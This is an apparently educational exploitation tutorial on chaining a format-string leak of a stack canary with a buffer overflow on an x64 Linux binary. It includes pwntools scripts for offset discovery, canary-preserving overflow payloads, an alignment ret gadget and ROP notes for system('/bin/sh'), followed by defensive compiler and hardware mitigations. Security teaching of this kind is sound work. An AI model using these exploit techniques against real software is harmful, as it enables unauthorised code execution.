Stack Canary Bypass via Format String Vulnerability

Using format string bugs to leak stack canaries, then exploiting the buffer overflow with the leaked value - covering canary internals, format-string read primitives, offset discovery, and the full chained exploit.

The Setup

Target binary has: stack canary enabled, NX enabled, no PIE. A format string vulnerability exists before a buffer overflow.

This combination shows up surprisingly often - a server process that takes a “name” from the user, logs it via printf(name) (the bug), and later copies a different field with strcpy into a fixed-size stack buffer (the overflow). Each vulnerability on its own is awkward: the format string lets you read or write arbitrary memory but only in small windows, and the overflow is killed instantly by __stack_chk_fail because you cannot guess the canary. Chained, however, the format-string supplies exactly what the overflow lacks - the canary value - and the result is a clean code-execution exploit.

Before we walk through the chain, let’s make sure we understand what we’re up against.

What a Stack Canary Actually Is

A canary is a randomised guard value that the compiler inserts on the stack between the local variables and the saved frame pointer / return address. Function prologue:

sub  rsp, <frame>
mov  rax, qword ptr fs:[0x28]   ; per-thread canary from TLS
mov  qword ptr [rbp - 8], rax

Function epilogue:

mov  rax, qword ptr [rbp - 8]
xor  rax, qword ptr fs:[0x28]
jne  __stack_chk_fail            ; abort if the value changed
add  rsp, <frame>
ret

A linear stack overflow that walks toward the saved return address must necessarily pass through the canary. Overwrite the canary with the wrong bytes and __stack_chk_fail slams the door.

The canary lives at TLS offset fs:[0x28] on x64 Linux glibc, derived once at process start from /dev/urandom (with the lowest byte forced to \x00, see below). It does not change between calls within the same thread, which is why a single leak is sufficient.

The Tell-Tale Null Byte

To prevent the canary from being leaked through strcpy, gets, or any other null-terminated copy primitive, glibc forces the least significant byte to \x00. This is the first thing to look for when triaging a candidate value:

0x00f7a4b1c2d3e4f5   ← canary candidate, low byte = 0x00 ✓
0xa1b2c3d4e5f60718   ← not a canary, no null byte

This nullness is also why an off-by-one null-terminator overflow doesn’t bypass the canary on its own - the byte you stomp is already 0.

Step 1: Leak the Canary

The canary sits between the buffer and the saved return address. Use %p format specifiers to dump stack values:

# Send format string payload to find canary offset
for i in range(1, 30):
    io.sendline(f"%{i}$p")
    leak = io.recvline()
    print(f"Offset {i}: {leak}")
# Canary typically ends in \x00 and is at a consistent offset

How the Read Primitive Works

printf("%n$p") walks its variadic argument area until the n-th 8-byte slot (on x64) and prints whatever is there as a hex pointer. On x64 the first 5 slots come from registers rsi, rdx, rcx, r8, r9 (since rdi already holds the format string itself), and from the 6th slot onward the function reads directly off the stack.

So %6$p is the first stack-resident value, %7$p the next 8 bytes after that, and so on, walking up the stack frame in 8-byte strides until you hit the canary, the saved RBP, the return address, and eventually arguments to whatever called vuln().

Discovering the Canary Offset

Two reliable identifying signals:

Low byte is 0x00 (printed as 0x...00 because %p doesn’t print leading zeros - looks like a value with the last hex pair missing).
High byte is randomised but not page-aligned, and definitely not 0x7f/0x55 (which would suggest a stack/heap address).

Sample loop output on a debug binary:

Offset  6: 0x4141414141414141     ← our 'AAAAAAAA' input on stack
Offset  7: 0x7ffd1234abc8         ← stack address (rbp/argv neighbour)
Offset  8: 0x90b41fe2e91d3a00     ← canary (low byte 00) ✓
Offset  9: 0x7ffd1234abe0         ← saved rbp
Offset 10: 0x000055d4cafe1234     ← saved return address

Once you have the canary offset (here, 8), every subsequent run of the binary in the same thread reads the same value off %8$p until the process restarts.

Brute-Forcing the Format Specifier

Sometimes the printf wrapper is buggier and refuses long format strings. In that case, send each %i$p individually and reconcatenate output, or use pwntools’ FmtStr helper:

from pwn import *

def exec_fmt(payload):
    io = process('./vuln')
    io.sendlineafter(b'> ', payload)
    return io.recvline()

# pwntools auto-discovers the offset
auto = FmtStr(exec_fmt)
print(f"Format-string offset: {auto.offset}")

Step 2: Identify the Canary

Stack canaries on Linux always have \x00 as the least significant byte (to terminate string copies). Look for an 8-byte value matching this pattern.

If multiple candidates fit (rare but possible - a stale stack value from a previous frame can also have a \x00 somewhere), use additional disambiguators:

Repeatable across runs in the same thread: the canary is the same; stack pointers and addresses change with ASLR.
pwndbg/gef confirmation: under a debugger, run canary (pwndbg) or compare fs:[0x28] to the leaked value.
Position relative to known anchors: the canary always sits between your buffer and the saved RBP. If you control a long enough input, you can locate the boundary precisely.

Step 3: Overflow with Leaked Canary

canary = int(leak, 16)
payload  = b"A" * BUFFER_SIZE      # Fill buffer
payload += p64(canary)              # Overwrite canary with leaked value
payload += b"B" * 8                 # Saved RBP
payload += p64(win_function)        # Return address
io.sendlineafter(b'payload:\n', payload)

BUFFER_SIZE is the distance from the start of your overflowed buffer to the canary. You can determine it with a cyclic De Bruijn pattern (pwntools cyclic 200), crash the binary, read rip (or the __stack_chk_fail argument register on a canary trip), and cyclic_find the offset.

Stack Alignment Caveat

On x64, the System V ABI requires 16-byte stack alignment immediately before a call. By the time your ret transfers control to win_function, RSP must be 16 * n + 8 (the +8 accounts for the saved return slot already consumed by the ret). If win_function (or anything it calls - particularly printf/system/puts) crashes inside an SSE instruction (movaps, movdqa), insert a single extra ret gadget:

ret_gadget = 0x401016        # any plain `ret` in the binary
payload  = b"A" * BUFFER_SIZE
payload += p64(canary)
payload += b"B" * 8
payload += p64(ret_gadget)   # alignment fix-up
payload += p64(win_function)

When `win()` Doesn’t Exist

If the binary doesn’t conveniently provide a win function, the same scaffolding hosts a ROP chain instead - leak libc through puts(puts@got), return back to main, and on the second pass send a chain that calls system("/bin/sh") (see the companion ret2libc post for the libc-leak primitive).

Why This Works

The canary check (__stack_chk_fail) compares the stack value against the stored canary. If they match, the check passes even though you’ve overwritten the return address. The format string bug gives you the read primitive needed to obtain the canary value.

Restated: SSP (Stack Smashing Protector) is a detection mitigation, not a prevention mitigation. It assumes the attacker has no way to learn the canary value before triggering the overflow - given that single assumption, it works. A format-string read primitive breaks the assumption directly. A heap-buffer-info-leak, an out-of-bounds read on the stack via an unrelated bug, a TLS leak, or even a fork-without-randomisation oracle (canaries are inherited from the parent in fork()) - all of them break the same assumption from different angles.

Beyond a Single Bug

The same format-string read primitive doubles as:

PIE bypass: read a code pointer from the stack to derive the program base.
libc leak: read a return address that points into libc to derive libc_base.
Frame pointer leak: read the saved RBP to derive the stack base, useful for stack-pivot ROP.
Arbitrary write (with %n): if you can use %n and the format string is large enough, you don’t need the buffer overflow at all - overwrite a GOT entry directly.

A complete exploit on a fully-mitigated binary often looks like: format-string read for canary, format-string read for libc leak, return back to vuln(), second-pass overflow with leaked canary + ROP chain calling system("/bin/sh").

Defender’s Side

To make this exact exploit infeasible:

Compile with -Wformat -Wformat-security -Werror=format-security - gcc/clang flag direct user-controlled format strings.
FORTIFY_SOURCE=2/3 - __printf_chk rejects format strings that contain %n and validates argument counts at runtime when the format string is in writable memory.
Per-call canaries (e.g. some hardened toolchains, kernel RANDSTRUCT) - the canary changes between functions, so a leak from one function does not help against an overflow in another.
Shadow stacks (CET / Intel CET / MTE on ARM) - the saved return address is mirrored in a hardware-protected region; even a correct canary value is insufficient to redirect control flow.

Format string bugs are the best friend of stack canary bypass. Whenever you see both a format string and a buffer overflow in the same binary, the exploit path is clear: read first, write second, and the protections fall in order.